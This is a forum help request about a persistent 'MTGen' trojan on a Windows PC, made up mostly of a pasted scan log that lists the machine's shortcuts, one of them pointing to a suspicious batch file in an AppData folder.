
MTGen Trojan won't go away


  • This topic is locked
34 replies to this topic

#1 RedArach

RedArach

  • Members
  • 24 posts

Posted 08 January 2017 - 07:25 PM

along with its 5 root friends. Ran FRST, Malwarebytes, think the kitchen sink (sarcasm, I'm fried)? and Avast has been clueless to the entire clusterbug.

 

Shortcut findings:

 

Users shortcut scan result (x64) Version: 08-01-2017
Ran by Owner (08-01-2017 16:13:15)
Running from C:\Users\Owner\Downloads
Boot Mode: Normal
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
 
 
Shortcut: C:\Users\Owner\AppData\Local\c345b\ce9d6.lnk -> C:\Users\Owner\AppData\Local\c345b\a0f5a.bat ()
 
 
Shortcut: C:\ProgramData\{A328A61B-C332-4C8C-A740-42F7F71DC398}\DDV.lnk -> 
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe After Effects CC 2014.lnk -> C:\Program Files\Adobe\Adobe After Effects CC 2014\Support Files\AfterFX.exe (Adobe Systems Incorporated)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe (Adobe Systems Incorporated)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Fuse CC (Preview).lnk -> C:\Program Files (x86)\Adobe\Adobe Fuse CC (Preview)\Code\Build\Output\Fuse\bin\Release\Fuse.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator CC 2015.3.lnk -> C:\Program Files\Adobe\Adobe Illustrator CC 2015.3\Support Files\Contents\Windows\Illustrator.exe (Adobe Systems Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Lightroom.lnk -> D:\Creative Cloud Files\Adobe Lightroom\lightroom.exe (Adobe Systems)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Media Encoder CC 2015.3.lnk -> C:\Program Files\Adobe\Adobe Media Encoder CC 2015.3\Adobe Media Encoder.exe (Adobe Systems Incorporated)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop CC 2015.5.lnk -> C:\Program Files\Adobe\Adobe Photoshop CC 2015.5\Photoshop.exe (Adobe Systems, Incorporated)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk -> C:\Windows\Installer\{AC76BA86-7AD7-FFFF-7B44-AB0000000001}\SC_Reader.ico ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk -> C:\Windows\Installer\{56EC47AA-5813-4FF6-8E75-544026FBEA83}\AppleSoftwareUpdateIco.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk -> C:\Program Files\AVAST Software\SZBrowser\launcher.exe (Avast Software)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell Help Documentation.lnk -> C:\Program Files\Dell Inc\Dell Edoc Viewer\EDocs.exe (Dell Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Media Center.lnk -> C:\Windows\ehome\ehshell.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Anytime Upgrade.lnk -> C:\Windows\System32\WindowsAnytimeUpgradeUI.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows DVD Maker.lnk -> C:\Program Files\DVD Maker\DVDMaker.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Fax and Scan.lnk -> C:\Windows\System32\WFS.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk -> C:\Windows\System32\xpsrchvw.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XSplit\XSplit Broadcaster.lnk -> D:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.Core.exe (SplitMediaLabs)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XSplit\XSplit Gamecaster.lnk -> D:\Program Files (x86)\SplitmediaLabs\XSplit Gamecaster\XSplit.Gamecaster.exe (SplitmediaLabs)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\World of Warcraft\World of Warcraft.lnk -> D:\World of Warcraft\World of Warcraft Launcher.exe (Blizzard Entertainment)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wacom Tablet\Wacom Desktop Center.lnk -> C:\Program Files\Tablet\Wacom\32\WacomDesktopCenter.exe (Wacom Technology, Corp.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wacom Tablet\Wacom Display Settings.lnk -> C:\Program Files\Tablet\Wacom\32\LCDSettings.exe (Wacom Technology, Corp.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wacom Tablet\Wacom Tablet Preference File Utility.lnk -> C:\Program Files\Tablet\Wacom\32\PrefUtil.exe (Wacom Technology, Corp.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wacom Tablet\Wacom Tablet Properties.lnk -> C:\Program Files\Tablet\Wacom\Professional_CPL.exe (Wacom Technology, Corp.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam\Steam.lnk -> D:\games\Steam.exe (Valve Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SQUARE ENIX\FINAL FANTASY XIV - A Realm Reborn\FINAL FANTASY XIV - A Realm Reborn.lnk -> D:\games\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivboot.exe (SQUARE ENIX CO., LTD.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SQUARE ENIX\FINAL FANTASY XIV - A Realm Reborn\FINAL FANTASY XIV System Information.lnk -> D:\games\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivsysinfo.exe (SQUARE ENIX CO., LTD.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype\Skype.lnk -> C:\Program Files (x86)\Skype\Phone\Skype.exe (Skype Technologies S.A.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation\GeForce Experience.lnk -> C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\LaunchGFExperience.exe (NVIDIA Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation\3D Vision\3D Vision Photo Viewer.lnk -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvstview.exe (NVIDIA Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight\Microsoft Silverlight.lnk -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\Silverlight.Configuration.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes\Malwarebytes.lnk -> D:\Program Files\Malwarebytes\Anti-Malware\mbam.exe (Malwarebytes)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes\Uninstall Malwarebytes.lnk -> D:\Program Files\Malwarebytes\Anti-Malware\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Create Recovery Disc.lnk -> C:\Windows\System32\recdisc.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Remote Assistance.lnk -> C:\Windows\System32\msra.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Logitech\Logitech Webcam Software.lnk -> C:\Program Files (x86)\Common Files\LogiShrd\LWSPlugins\LWS\Applets\HelpMain\launchershortcut.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes\About iTunes.lnk -> D:\Program Files\iTunes\iTunes.Resources\en.lproj\About iTunes.rtf ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes\iTunes.lnk -> D:\Program Files\iTunes\iTunes.exe (Apple Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel\Intel® Rapid Storage Technology.lnk -> C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorUI.exe (Intel Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud\iCloud Photos.lnk -> C:\Program Files (x86)\Common Files\Apple\Internet Services\ShellStreamsShortcut.exe (Apple Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud\iCloud.lnk -> C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloud.exe (Apple Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Heroes of the Storm\Heroes of the Storm.lnk -> D:\Heroes of the Storm\Heroes of the Storm.exe (Blizzard Entertainment)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\GameExplorer.lnk -> C:\Windows\System32\gameux.dll (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ERUNT\Documentation.lnk -> D:\Program Files (x86)\ERUNT\README.TXT (No File)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ERUNT\ERUNT Homepage.lnk -> D:\Program Files (x86)\ERUNT\ERUNT.URL (No File)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ERUNT\ERUNT.lnk -> D:\Program Files (x86)\ERUNT\ERUNT.EXE (No File)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ERUNT\NTREGOPT.lnk -> D:\Program Files (x86)\ERUNT\NTREGOPT.EXE (No File)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ERUNT\Uninstall ERUNT.lnk -> D:\Program Files (x86)\ERUNT\unins000.exe (No File)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DW WLAN\DW WLAN Card Readme.lnk -> C:\Program Files\Dell\DW WLAN Card\Readme.rtf ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell Audio\Dell Audio.lnk -> C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Realtek Semiconductor)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell\Dell Backup and Recovery.lnk -> C:\Program Files (x86)\Dell Backup and Recovery\Dbr.exe (SoftThinks - Dell)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell\Dell Digital Delivery.lnk -> C:\Program Files (x86)\Dell Digital Delivery\DeliveryTray.exe (Dell Products, LP)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell\Dell Update.lnk -> C:\Program Files (x86)\Dell Update\DellUpTray.exe (Dell Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software\Avast Free Antivirus.lnk -> C:\Program Files\AVAST Software\Avast\avastui.exe (AVAST Software)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Component Services.lnk -> C:\Windows\System32\comexp.msc ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Data Sources (ODBC).lnk -> C:\Windows\System32\odbcad32.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\iSCSI Initiator.lnk -> C:\Windows\System32\iscsicpl.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Memory Diagnostics Tool.lnk -> C:\Windows\System32\MdSched.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Print Management.lnk -> C:\Windows\System32\printmanagement.msc ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk -> C:\Windows\System32\services.msc ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk -> C:\Windows\System32\msconfig.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows Firewall with Advanced Security.lnk -> C:\Windows\System32\WF.msc ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Calculator.lnk -> C:\Windows\System32\calc.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\displayswitch.lnk -> C:\Windows\System32\displayswitch.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Math Input Panel.lnk -> C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\NetworkProjection.lnk -> C:\Windows\System32\NetProj.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk -> C:\Windows\System32\mspaint.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Remote Desktop Connection.lnk -> C:\Windows\System32\mstsc.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk -> C:\Windows\System32\SnippingTool.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sound Recorder.lnk -> C:\Windows\System32\SoundRecorder.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sticky Notes.lnk -> C:\Windows\System32\StikyNot.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sync Center.lnk -> C:\Windows\System32\mobsync.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Wordpad.lnk -> C:\Program Files\Windows NT\Accessories\wordpad.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell (x86).lnk -> C:\Windows\SysWOW64\Windowspowershell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE (x86).lnk -> C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell_ISE.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell_ISE.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\ShapeCollector.lnk -> C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\TabTip.lnk -> C:\Program Files\Common Files\Microsoft Shared\ink\TabTip.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Character Map.lnk -> C:\Windows\System32\charmap.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\dfrgui.lnk -> C:\Windows\System32\dfrgui.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Disk Cleanup.lnk -> C:\Windows\System32\cleanmgr.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\System Information.lnk -> C:\Windows\System32\msinfo32.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\System Restore.lnk -> C:\Windows\System32\rstrui.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Windows Easy Transfer Reports.lnk -> C:\Windows\System32\migwiz\PostMig.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Windows Easy Transfer.lnk -> C:\Windows\System32\migwiz\migwiz.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Help.lnk -> C:\Windows\System32\shell32.dll (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk -> C:\Windows\System32\notepad.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Run.lnk -> C:\Windows\System32\shell32.dll (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\computer.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Control Panel.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Private Character Editor.lnk -> C:\Windows\System32\eudcedit.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Magnify.lnk -> C:\Windows\System32\Magnify.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Narrator.lnk -> C:\Windows\System32\Narrator.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\On-Screen Keyboard.lnk -> C:\Windows\System32\osk.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Owner\Links\Creative Cloud Files.lnk -> C:\Users\Owner\Creative Cloud Files ()
Shortcut: C:\Users\Owner\Links\Desktop.lnk -> C:\Users\Owner\Desktop ()
Shortcut: C:\Users\Owner\Links\Downloads.lnk -> C:\Users\Owner\Downloads ()
Shortcut: C:\Users\Owner\Links\Dropbox.lnk -> C:\Users\Owner\Dropbox ()
Shortcut: C:\Users\Owner\Links\Favorites.lnk -> System Folder
Shortcut: C:\Users\Owner\Links\RecentPlaces.lnk -> System Folder
Shortcut: C:\Users\Owner\Documents\Heroes of the Storm\T_115896516_363@1.lnk -> C:\Users\Owner\Documents\Heroes of the Storm\Accounts\88616997\1-Hero-1-7053406 ()
Shortcut: C:\Users\Owner\Desktop\Adobe Fuse CC (Preview).lnk -> C:\Program Files (x86)\Adobe\Adobe Fuse CC (Preview)\Code\Build\Output\Fuse\bin\Release\Fuse.exe ()
Shortcut: C:\Users\Owner\Desktop\Adobe Lightroom.lnk -> D:\Creative Cloud Files\Adobe Lightroom\lightroom.exe (Adobe Systems)
Shortcut: C:\Users\Owner\Desktop\DATAPART1 (D).lnk -> D:\ ()
Shortcut: C:\Users\Owner\Desktop\ERUNT.lnk -> D:\Program Files (x86)\ERUNT\ERUNT.EXE (No File)
Shortcut: C:\Users\Owner\Desktop\joker face\joker roughdraft 001 - Shortcut.lnk -> C:\Users\Owner\Desktop\keep for Tamaria\elders etc\2016-07-10 joker roughdraft\joker roughdraft 001.bmp ()
Shortcut: C:\Users\Owner\Desktop\joker face\jokerrough precolor 001 - Shortcut.lnk -> C:\Users\Owner\Desktop\keep for Tamaria\elders etc\2016-07-10 jokerrough precolor\jokerrough precolor 001.jpg ()
Shortcut: C:\Users\Owner\Creative Cloud Files (archived) (2)\Adobe Illustrator CC 2015\Adobe Illustrator CC 2015.lnk -> D:\Creative Cloud Files\Adobe Illustrator CC 2015\Support Files\Contents\Windows\Illustrator.exe (No File)
Shortcut: C:\Users\Owner\Creative Cloud Files (archived) (1)\Adobe Illustrator CC 2015\Adobe Illustrator CC 2015.lnk -> D:\Creative Cloud Files\Adobe Illustrator CC 2015\Support Files\Contents\Windows\Illustrator.exe (No File)
Shortcut: C:\Users\Owner\Creative Cloud Files\Adobe Illustrator CC 2015\Adobe Illustrator CC 2015.lnk -> D:\Creative Cloud Files\Adobe Illustrator CC 2015\Support Files\Contents\Windows\Illustrator.exe (No File)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\Steam.lnk -> D:\games\Steam.exe (Valve Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ERUNT AutoBackup.lnk -> D:\Program Files (x86)\ERUNT\AUTOBACK.EXE (No File)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Help.lnk -> C:\Windows\System32\shell32.dll (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Blender\blender.lnk -> D:\Program Files\Blender Foundation\Blender\blender.exe (Blender Foundation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk -> C:\Windows\System32\notepad.exe (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Run.lnk -> C:\Windows\System32\shell32.dll (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\computer.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Control Panel.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Private Character Editor.lnk -> C:\Windows\System32\eudcedit.exe (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Magnify.lnk -> C:\Windows\System32\Magnify.exe (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Narrator.lnk -> C:\Windows\System32\Narrator.exe (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\On-Screen Keyboard.lnk -> C:\Windows\System32\osk.exe (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\SendTo\Dropbox.lnk -> C:\Users\Owner\Dropbox ()
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\XSplit Broadcaster.lnk -> D:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.Core.exe (SplitMediaLabs)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Adobe Illustrator CC 2015.3.lnk -> C:\Program Files\Adobe\Adobe Illustrator CC 2015.3\Support Files\Contents\Windows\Illustrator.exe (Adobe Systems Inc.)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Adobe Lightroom.lnk -> D:\Creative Cloud Files\Adobe Lightroom\lightroom.exe (Adobe Systems)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Adobe Photoshop CC 2015.5.lnk -> C:\Program Files\Adobe\Adobe Photoshop CC 2015.5\Photoshop.exe (Adobe Systems, Incorporated)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Steam.lnk -> D:\games\Steam.exe (Valve Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Public\Desktop\Adobe Creative Cloud.lnk -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe (Adobe Systems Incorporated)
Shortcut: C:\Users\Public\Desktop\Avast Free Antivirus.lnk -> C:\Program Files\AVAST Software\Avast\avastui.exe (AVAST Software)
Shortcut: C:\Users\Public\Desktop\Avast SafeZone Browser.lnk -> C:\Program Files\AVAST Software\SZBrowser\launcher.exe (Avast Software)
Shortcut: C:\Users\Public\Desktop\FINAL FANTASY XIV - Heavensward.lnk -> D:\games\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivboot.exe (SQUARE ENIX CO., LTD.)
Shortcut: C:\Users\Public\Desktop\GeForce Experience.lnk -> C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\LaunchGFExperience.exe (NVIDIA Corporation)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Public\Desktop\Heroes of the Storm.lnk -> D:\Heroes of the Storm\Heroes of the Storm.exe (Blizzard Entertainment)
Shortcut: C:\Users\Public\Desktop\iTunes.lnk -> D:\Program Files\iTunes\iTunes.exe (Apple Inc.)
Shortcut: C:\Users\Public\Desktop\Logitech Webcam Software  .lnk -> C:\Program Files (x86)\Common Files\LogiShrd\LWSPlugins\LWS\Applets\HelpMain\launchershortcut.exe ()
Shortcut: C:\Users\Public\Desktop\Malwarebytes.lnk -> D:\Program Files\Malwarebytes\Anti-Malware\mbam.exe (Malwarebytes)
Shortcut: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
Shortcut: C:\Users\Public\Desktop\Skype.lnk -> C:\Windows\Installer\{FC965A47-4839-40CA-B618-18F486F042C6}\SkypeIcon.exe ()
